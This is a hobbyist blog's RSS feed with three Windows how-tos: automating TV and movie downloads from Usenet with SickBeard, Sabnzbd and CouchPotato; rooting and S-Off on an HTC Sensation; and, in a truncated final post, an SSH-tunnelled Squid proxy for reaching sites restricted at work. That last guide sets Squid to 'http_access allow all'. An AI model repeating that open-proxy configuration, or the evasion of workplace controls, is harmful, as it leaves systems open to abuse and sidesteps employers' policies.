<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>NakedCleaner</title>
	
	<link>http://www.nakedcleaner.com</link>
	<description>Making my head a cleaner place.</description>
	<lastBuildDate>Thu, 23 Feb 2012 17:39:44 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/NakedCleaner" /><feedburner:info uri="nakedcleaner" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><creativeCommons:license>http://creativecommons.org/licenses/by-sa/2.0/</creativeCommons:license><feedburner:browserFriendly>This is an XML content feed. It is intended to be viewed in a newsreader or syndicated to another site, subject to copyright and fair use.</feedburner:browserFriendly><item>
		<title>Automating TV downloads</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/MuOF27ypKl0/</link>
		<comments>http://www.nakedcleaner.com/2012/02/automating-tv-downloads/#comments</comments>
		<pubDate>Thu, 02 Feb 2012 17:05:48 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2012/02/automating-tv-downloads/</guid>
		<description>Or as I like to think of it… Saving me time (or hell I’m too lazy to do that every day) The idea is that we have our media box watch for new episodes of out favourite shows and automatically download them, process them and get the meta data, saving us time, hassle, and… well [...]</description>
			<content:encoded><![CDATA[<p>Or as I like to think of it… Saving me time (or hell I’m too lazy to do that every day)</p>
<p>The idea is that we have our media box watch for new episodes of out favourite shows and automatically download them, process them and get the meta data, saving us time, hassle, and… well just that.</p>
<p>What we need :</p>
<ul>
<li>SickBeard &#8211; <a href="http://sickbeard.com/downloads.html" target="_blank">http://sickbeard.com/downloads.html</a> </li>
<li>Sabnzbd &#8211; <a href="http://sabnzbd.org/download/" target="_blank">http://sabnzbd.org/download/</a> </li>
<li>A news server account – <a href="http://www.easynews.com/fromafriend.html?ref_key=f9333c937c9e6480c7c9528b0d79e905e3e08620" target="_blank">http://www.easynews.com</a> </li>
<li>A notification Twitter account – <a href="http://www.twitter.com/" target="_blank">http://www.twitter.com</a> </li>
<li>A little time </li>
<li>Some patience </li>
</ul>
<p>Start with setting up your <a href="http://www.easynews.com/fromafriend.html?ref_key=f9333c937c9e6480c7c9528b0d79e905e3e08620" target="_blank">Easynews account</a>, click on through and sign up. Basic package is just fine, but if your downloading lots of shows then you might need a bigger one.</p>
<p><strong>Sabnzbd</strong></p>
<p>Download the windows installer for Sabnzbd and install it, go with defaults if they are OK, if not change em.</p>
<p>Once all installed etc, run Sabnzbd and it will open the default browser at <a href="http://localhost:8080">http://localhost:8080</a> and should look a little like below.</p>
<p><a href="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sab1.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="sab1" border="0" alt="sab1" src="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sab1_thumb.png" width="537" height="142" /></a></p>
<p>Click the Config button, and then Servers and configure the server and press Test, then save if all looks well.</p>
<p><a href="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sab2.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="sab2" border="0" alt="sab2" src="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sab2_thumb.png" width="541" height="272" /></a></p>
<p>Click Folders on the Left, and configure those. I use D:\Downloads\* for the temporary location of things, you can put it wherever you like, but I would use somewhere you can remember easily, else it’s inside the install folder for the App (Program Files\*). The main one to remember is where the script folder is, as we will be using that. Also make a note of the Scripts folder, you will need it later.</p>
<p>The only other thing I would recommend, is unticking the Launch browser box on the Switches page, as we are going to set this up to autorun.</p>
<p><a href="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sab3.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="sab3" border="0" alt="sab3" src="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sab3_thumb.png" width="544" height="348" /></a></p>
<p>OK, for now let’s leave that there, we do need to do some more stuff, but need the other stuff setup first.</p>
<p>Goto the General config page, and make a copy of the API Key, we need it in a bit.</p>
<p><strong>Sick Beard</strong></p>
<p>Right, there’s no installer for Sick Beard, so just unpack it to wherever you want (utils\sickbeard in my case), and run it.</p>
<p>That should then launch the page <a href="http://localhost:8081">http://localhost:8081</a></p>
<p><a href="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sick1.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="sick1" border="0" alt="sick1" src="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sick1_thumb.png" width="552" height="152" /></a></p>
<p>Copy the contents of the scripts\autoprocesstv to the scripts folder that you configured earlier in Sabnzbd (so d:\downloads\scripts in my case). Rename the &quot;autoProcessTV.cfg.sample&quot; file to &quot;autoProcessTV.cfg&quot;</p>
<p>Pop into Config, untick the Launch Browser box, click the search settings option and fill in the Sabnzbd API key (this is found in the General config tab in Sabnzbd)</p>
<p><a href="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sick2.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="sick2" border="0" alt="sick2" src="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sick2_thumb.png" width="555" height="158" /></a></p>
<p>Click the Post Processing option, then make sure the TV Download Dir points to the temporary folder that you setup in Sabnzbd (so D:\downloads\complete in my case), untick Keep original files and make sure Rename files is ticked.</p>
<p>We then need to sort metadata, i use the following setup</p>
<p><a href="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sick3.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="sick3" border="0" alt="sick3" src="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sick3_thumb.png" width="550" height="209" /></a></p>
<p>and now the TV naming, again I use this but feel free to make your own up</p>
<p><a href="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sick4.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="sick4" border="0" alt="sick4" src="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sick4_thumb.png" width="550" height="354" /></a></p>
<p><strong>UPDATE- </strong>Thanks to Simon (<a href="http://www.binaryjam.com">BinaryJam.com</a>) for the heads up on this missing section.</p>
<p>Goto config, search providers and make sure Womble and SickBeard are enabled, you can also add <a title="http://nzbindex.nl/" href="http://nzbindex.nl/">http://nzbindex.nl/</a> and <a title="https://nzb.su/" href="https://nzb.su/">https://nzb.su/</a> to the list if you would like.</p>
<p><a href="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sicksearch.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="sicksearch" border="0" alt="sicksearch" src="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sicksearch_thumb.png" width="548" height="439" /></a></p>
<p><strong>Finish it off and get it working</strong></p>
<p>Right, let’s hook the scripts together now…</p>
<p>Go back to Sabnzbd, and select Config, sorting, and make sure nothing is ticked. Now select the Categories area and in the script click down and select sabToSickBeard.exe (if this option is not available you have not copied the files into the script folder we setup earlier)    <br /><a href="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sab4.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="sab4" border="0" alt="sab4" src="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sab4_thumb.png" width="551" height="100" /></a></p>
<p>This is the bit that does the move/rename magic.</p>
<p>Back over to Sick Beard, click Home, Add Show. If you are like me and already have a catalogue of stuff, then click Add Existing, add the folder and walk through the wizard for it, and all your shows will get imported, and setup (if you changed the naming convention then go through each show after it’s finished and press the rename episodes button on them all)</p>
<p>Otherwise you can search for a show, and add it and it will get scheduled to be downloaded for you.</p>
<p>Last things to do, in SickBeard goto Config, notifications, and setup your twitter info and press the Test button. Save that, and goto the location of SickBeard on disk, and open the config.ini file, and edit the twitter section</p>
<p>[Twitter]    <br />use_twitter = 1     <br />twitter_notify_onsnatch = 1     <br />twitter_notify_ondownload = 1     <br />twitter_username = Whatever     <br />twitter_password = Whatever     <br />twitter_prefix = D <strong>YourTwitterName</strong> : Sick Beard :</p>
<p><a href="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sick5.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="sick5" border="0" alt="sick5" src="http://www.nakedcleaner.com/wp-content/uploads/2012/02/sick5_thumb.png" width="547" height="348" /></a></p>
<p>Click the little Spanner menu option, and Restart, then click Coming Episodes and see if it looks right.</p>
<p>If your happy everything is working, then add shortcuts to the startup folder of the machine (or via the registry)</p>
<p><a href="http://www.nakedcleaner.com/wp-content/uploads/2012/02/finish.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="finish" border="0" alt="finish" src="http://www.nakedcleaner.com/wp-content/uploads/2012/02/finish_thumb.png" width="547" height="321" /></a></p>
<p>That&#8217;s about it! not too taxing!</p>
<p>I think that’s it, however feel free to point my mistakes out and I’ll update this to be correct, after all I did do all this at 3am!</p>
<p><strong>Update – </strong>For movie lovers, we can do a similar thing with <a href="http://CouchPota.to">CouchPotato</a></p>
<p>All we need to do (because we have most of our setup done) is the following.</p>
<p>Download the windows client from the <a href="http://CouchPota.to">CouchPotato</a> site, unpack it to a folder that’s sensible and run the EXE.</p>
<p>This should fire up the CouchPotato interface in the default browser. Let’s go configure it.</p>
<p>Click the Cog, then General, I’ve set the port to 8082, so it’s in line with what we have already used with the other apps. You can also change the search time here if you want it to search more than once a day. I would also untick the Launch Browser option. Click Save at the bottom.   <br /><a href="http://www.nakedcleaner.com/wp-content/uploads/2012/02/pot1.png" rel="lightbox"><img style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="pot1" border="0" alt="pot1" src="http://www.nakedcleaner.com/wp-content/uploads/2012/02/pot1_thumb.png" width="550" height="236" /></a></p>
<p>Next we need to configure the downloader, here we will use Sabnzbd, seems daft to use anything else seems as we are already using it. Make sure Hostname is set, the Apikey is OK, and create a category (movies here) and click save   <br /><a href="http://www.nakedcleaner.com/wp-content/uploads/2012/02/pot2.png" rel="lightbox"><img style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="pot2" border="0" alt="pot2" src="http://www.nakedcleaner.com/wp-content/uploads/2012/02/pot2_thumb.png" width="410" height="428" /></a></p>
<p>Set up your Providers, this is similar to the settings we used on SickBeard, I used NZBMatrix, NZBsRus, <a href="mailto:#alt.binaries.hdtv.x264@EFnet">#alt.binaries.hdtv.x264@EFnet</a> and MysterBin. But if you have accounts with Newzbin etc then use those as well. Click save after setting it up.</p>
<p>Quality allows you to choose what files you want. This is completely upto you, obviously 1080p downloads will use lot’s of space. Click save after your changes.</p>
<p>Renaming next, here we get the post processing done. I’ve got my download folder set to <strong>downloads\movies </strong>and to then move to my Downloaded movies folder. I’ve just created the movies folder in the same ‘temporary’ area as the TV stuff. Anyhow, make a note of what paths you use as we will need them in a moment. Folder naming is upto you, but the default works just fine in my case (MovieName (year)). Select the clean-up box, and the enable box and click save.</p>
<p><a href="http://www.nakedcleaner.com/wp-content/uploads/2012/02/pot3.png" rel="lightbox"><img style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="pot3" border="0" alt="pot3" src="http://www.nakedcleaner.com/wp-content/uploads/2012/02/pot3_thumb.png" width="545" height="256" /></a></p>
<p>As for the rest of the configuration (notifications etc) you can configure as you see fit.</p>
<p>Off into Sabnzbd then configuration, categories. Create a new category called movies with no scripts set up, all we need is the folder (as we decided upon earlier), then click save. </p>
<p><a href="http://www.nakedcleaner.com/wp-content/uploads/2012/02/Sab10.png" rel="lightbox"><img style="background-image: none; border-bottom: 0px; border-left: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top: 0px; border-right: 0px; padding-top: 0px" title="Sab10" border="0" alt="Sab10" src="http://www.nakedcleaner.com/wp-content/uploads/2012/02/Sab10_thumb.png" width="551" height="179" /></a></p>
<p>Pop back onto Couch Potato and add a movie. It should find and pass the download off to Sabnzbd, then after the download and unpack, the file should get moved over to your downloaded movies folder.</p>
<p>The only part I’m now missing in the automation is the metadata for the movies. Obviosuly if you use XBMC or Media Browser then this is not an issue (as it will get it itself if needed). However it’s nice to have it pre downloaded, just in case.</p>
<p>If anyone knows a decent command line metadata processor then let me know. Thanks.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/0MeIo53hJCIEiGw3f-Uk9KFz9ic/0/da"><img src="http://feedads.g.doubleclick.net/~a/0MeIo53hJCIEiGw3f-Uk9KFz9ic/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/0MeIo53hJCIEiGw3f-Uk9KFz9ic/1/da"><img src="http://feedads.g.doubleclick.net/~a/0MeIo53hJCIEiGw3f-Uk9KFz9ic/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=MuOF27ypKl0:BTb2I7RJcBU:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=MuOF27ypKl0:BTb2I7RJcBU:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=MuOF27ypKl0:BTb2I7RJcBU:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=MuOF27ypKl0:BTb2I7RJcBU:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=MuOF27ypKl0:BTb2I7RJcBU:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=MuOF27ypKl0:BTb2I7RJcBU:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=MuOF27ypKl0:BTb2I7RJcBU:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=MuOF27ypKl0:BTb2I7RJcBU:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=MuOF27ypKl0:BTb2I7RJcBU:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=MuOF27ypKl0:BTb2I7RJcBU:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=MuOF27ypKl0:BTb2I7RJcBU:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=MuOF27ypKl0:BTb2I7RJcBU:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=MuOF27ypKl0:BTb2I7RJcBU:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/MuOF27ypKl0" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2012/02/automating-tv-downloads/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2012/02/automating-tv-downloads/</feedburner:origLink></item>
		<item>
		<title>Sensation Root/S-Off</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/aM21YuV8X-I/</link>
		<comments>http://www.nakedcleaner.com/2011/08/sensation-roots-off/#comments</comments>
		<pubDate>Tue, 16 Aug 2011 14:21:57 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2011/08/sensation-roots-off/</guid>
		<description>Oh, and because a few people have asked about what all the terms mean, I’ll try explain it all simply as well. OK, so to Root the HTC Sensation we need to write a few new files (SuperUser executables) to the system area of the phone. The only people that are allowed to do that [...]</description>
			<content:encoded><![CDATA[<p>Oh, and because a few people have asked about what all the terms mean, I’ll try explain it all simply as well.</p>
<p>OK, so to Root the HTC Sensation we need to write a few new files (SuperUser executables) to the system area of the phone. The only people that are allowed to do that are HTC (and Google I suppose), and that’s protected by the use of a certificate that they sign the update with. Android uses ZIP files for updates, so it’s an unsigned ZIP we have to get installed (in our case su-2.3.6.3-efgh-signed).</p>
<p>We are also going to make our phones a little more safe to play with, we will put a custom version of the recovery partition onto the phone. That way if something untoward happens then we can recover a backup or install a new ROM to the device (more on that later).</p>
<p><strong>Lets start then</strong></p>
<p>Download the following</p>
<ul>
<li><a href="http://www.nakedcleaner.com/files/sensation/HTC Driver 3.0.0.007.rar">HTC Driver 3</a></li>
<li><a href="http://www.nakedcleaner.com/files/sensation/PG58IMG.zip">PG58IMG.ZIP</a></li>
<li><a href="http://www.nakedcleaner.com/files/sensation/su-2.3.6.3-efgh-signed.zip">su-2.3.6.3-efgh-signed.zip</a></li>
</ul>
<p>OK, so S-Off, it means just what you think it does, Security-Off. Essentially what we are doing is telling the phone that everyone is trusted to make changes to the System area of Android. To do this we need to change the HBoot over to one we can control. What’s a HBoot? yes, thought you might ask, think of the HBoot as the BIOS on a PC. It basically checks all the hardware is as it’s meant to be, then loads the first part of the Operating System, in this case Android. After we have switched it over from HTC’s default one, to our modified one, then we will be able to launch our own software. This allows us to run our own recovery tools, that allows unsigned code installs.</p>
<p>Right, lets get to changing the HBoot over then. For this we will use the well regarded and liked <strong><a href="http://revolutionary.io/" target="_blank">revolutionary</a> </strong></p>
<ol>
<li>Pop and download the tool, then fill in the form with the relevant information to get your code. (if you need to know what version of HBoot you are using then you need to switch off fastboot by going to settings, power, fastboot and making sure it’s unticked, then reboot the phone by long power, reboot. While it’s rebooting press and hold volume down until you see the White HBoot screen, the version is there)</li>
<li>Download the HTC Driver above, and unpack it (you might not need it, but worth having if you haven&#8217;t installed HTC Sync, just point Windows at it if at any point it asks for a driver). Make sure HTC Sync is turned off (right click in the task tray, and exit)</li>
<li>Pop the USB debugging on on the phone (settings, applications, development, USB Debugging)</li>
<li>Run Revolution and it will reboot the phone into HBoot a few times, second time round you should see the word Revolutionary at the top, then will ask you to install ClockWork recovery, this is an older version that has issues, so say no, it should now say it’s complete.</li>
</ol>
<p>Well done, your now S-Off. Simple hey. Let’s get Clockwork Recovery onto the device next.</p>
<ol>
<li>Copy the PGM58IMG.ZIP to the root of the phone SD Card (either use the SD card yourself, or plug the phone in and select USB Storage mode) make sure it’s in the root. And also make sure it’s called <strong>PG58IMG.ZIP.</strong></li>
<li>Power Down the phone, long press then power off.</li>
<li>Hold the Down Volume button, then Power the phone back up. The white HBoot should come up on screen, then it should see the ZIP on the SD, and check it.</li>
<li>Say Yes to the prompt when the check has completed (Volume up) and let it complete.</li>
<li>When it say, press the power button to reboot the device.</li>
</ol>
<p>OK then, we now have recovery installed. We are safe to do what we please now. We also now have a choice, install a complete new ROM, or just Root the ROM we have?</p>
<p>For new ROM’s pop over to <a href="http://forum.xda-developers.com/forumdisplay.php?f=1112">XDA-Devs</a> sensation dev forum, and choose yourself one.</p>
<p>However, some people are happier with sticking to HTC’s ROM’s. So we need to get that one Rooted.</p>
<ol>
<li>When Android is back up and running, plug device in and remove the PG58IMG.ZIP from the SD (or rename it)</li>
<li>Copy the <strong>su-2.3.6.3-efgh-signed.zip </strong>onto the SD card.</li>
<li>From market install <a href="https://market.android.com/details?id=com.koushikdutta.rommanager&amp;feature=search_result">Rom Manager</a> to the device.</li>
<li>Power the phone off, and hold Volume down while turning on again, in HBoot select  Recovery using the volume keys, then press the power button.</li>
<li>The device will look like it’s restarting, however it’s loading Clockwork Recovery. When in Clockwork select install ZIP from SDCard and press power.</li>
<li>Select Choose Zip press power.</li>
<li>Select the <strong>su-2.3.6.3-efgh-signed.zip </strong>file and press Power</li>
<li>Goto the Yes Install option and press Power</li>
<li>The SU binaries are now installed, and you are dropped back to the menu. Select go back, then reboot.</li>
</ol>
<p>Device now is back in a secure state, and you have Root (perma-root) to the device. There should now be a new option in your App Drawer called Superuser, this can be used to manage apps.</p>
<p>Fire up Marketplace and download Superuser, this will overwrite the version we just installed (odd I know, not needed but allows for auto updating) with the latest version.</p>
<p>Fire up Rom Manager now, select the top option, and install the latest recovery (so it can be auto updated), select the Backup option, and make a backup. The device will reboot into Clockwork Recovery while tha backup is done. This means if anything bad should happen to your device, you can just recover (using the volume down+power, Recovery, Restore Backup), even if your device will not load Android.</p>
<p>NOTE – Custom Roms are installed the exact same way as we installed the SU binaries earlier. Just select the custom ROM ZIP instead.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/l92-E6Xr3FZJJ4XF-n4YuZVoJb4/0/da"><img src="http://feedads.g.doubleclick.net/~a/l92-E6Xr3FZJJ4XF-n4YuZVoJb4/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/l92-E6Xr3FZJJ4XF-n4YuZVoJb4/1/da"><img src="http://feedads.g.doubleclick.net/~a/l92-E6Xr3FZJJ4XF-n4YuZVoJb4/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=aM21YuV8X-I:hLfocG1nOx8:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=aM21YuV8X-I:hLfocG1nOx8:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=aM21YuV8X-I:hLfocG1nOx8:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=aM21YuV8X-I:hLfocG1nOx8:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=aM21YuV8X-I:hLfocG1nOx8:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=aM21YuV8X-I:hLfocG1nOx8:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=aM21YuV8X-I:hLfocG1nOx8:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=aM21YuV8X-I:hLfocG1nOx8:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=aM21YuV8X-I:hLfocG1nOx8:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=aM21YuV8X-I:hLfocG1nOx8:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=aM21YuV8X-I:hLfocG1nOx8:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=aM21YuV8X-I:hLfocG1nOx8:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=aM21YuV8X-I:hLfocG1nOx8:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/aM21YuV8X-I" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2011/08/sensation-roots-off/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2011/08/sensation-roots-off/</feedburner:origLink></item>
		<item>
		<title>SSH Proxy/Port access</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/EjsM8t7-kGo/</link>
		<comments>http://www.nakedcleaner.com/2011/07/ssh-proxyport-access/#comments</comments>
		<pubDate>Thu, 14 Jul 2011 10:16:15 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2011/07/ssh-proxyport-access/</guid>
		<description>Here’s a quick guide on how to setup a secure SSH based encrypted proxy. I use this to browse when I want to get to work restricted sites, and when on a ‘free’ WiFi connection, as nothing is protected on them. This is all Windows based, but you could quiet happily take the concepts and [...]</description>
			<content:encoded><![CDATA[<p>Here’s a quick guide on how to setup a secure SSH based encrypted proxy. I use this to browse when I want to get to work restricted sites, and when on a ‘free’ WiFi connection, as nothing is protected on them. </p>
<p>This is all Windows based, but you could quiet happily take the concepts and apply it to your OS of choice.</p>
<p>What we need</p>
<ul>
<li>A PC connected to the net that’s either on permanently, or has wake on lan (and a router that supports wake on net), I’ll assume that it’s on permanently for now and leave you to configure your WOL </li>
<li>An SSH server, for Windows we will be using <a href="http://www.bitvise.com/download-area">WinSSHD</a> by <a href="http://www.bitvise.com/">Bitvise</a> as it’s free for personal use, and easy to configure and maintain. For *nix systems you could easily use OpenSSH Server. </li>
<li>An SSH Client, again we will be using a <a href="http://www.bitvise.com/">Bitvise</a> product (makes life easy) called <a href="http://www.bitvise.com/download-area">Tunnelier</a>. However you could use OpenSSH, or any SSH client you like, for example <a href="http://www.chiark.greenend.org.uk/~sgtatham/putty/">PuTTY</a> </li>
<li>A Proxy Server, we will use <a href="http://www.squid-cache.org/">Squid</a>. (<a href="http://squid.acmeconsulting.it/Squid27.html">The Windows Build is here</a>). Reason being is it’s easy to get running, supports all OS’s and well documented. </li>
<li>A way of having a common permanent name (or IP address), I use <a href="http://www.no-ip.com/">No-IP</a> and the client, but fixed IP or any other DNS hoster you fancy. </li>
<li>Some patience </li>
</ul>
<p>Lets get started….</p>
<ul>
<li>Download and unpack Squid to the C Drive (<strong>C:\Squid</strong>) </li>
<li>In there we should have a bunch of folders in there now, looking a little like the image below      <br /><a href="http://www.nakedcleaner.com/wp-content/uploads/2011/07/SquidDir.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="SquidDir" border="0" alt="SquidDir" src="http://www.nakedcleaner.com/wp-content/uploads/2011/07/SquidDir_thumb.png" width="499" height="338" /></a> </li>
<li>Open up the <strong>ETC</strong> folder, and rename all the files so they all are *.conf (i.e take the .default off the end of the filenames) </li>
<li>fire up notepad, and edit the squid.conf file and search (CTRL-F) for the phrase <strong>http_access </strong>, This should say <strong>http_access deny all</strong> change this to <strong>http_access allow all</strong> we are not really worried about the security of your proxy server, as it’s only being accessed by already authenticated clients coming in over ssh. But if you want set the security up however you desire, as long as 127.0.0.1 has full access. (read the section above the change for details) </li>
<li>Launch a command window and goto the <strong>sbin</strong> folder in C:\Squid and type <strong>squid –z </strong>this will create the swap folders that squid needs to run, then type <strong>squid </strong>to start the app in interactive mode (to check) </li>
<li>Test this is working by setting the local browser to use 127.0.0.1 on port 3128, if you can browse the net then squid is working. </li>
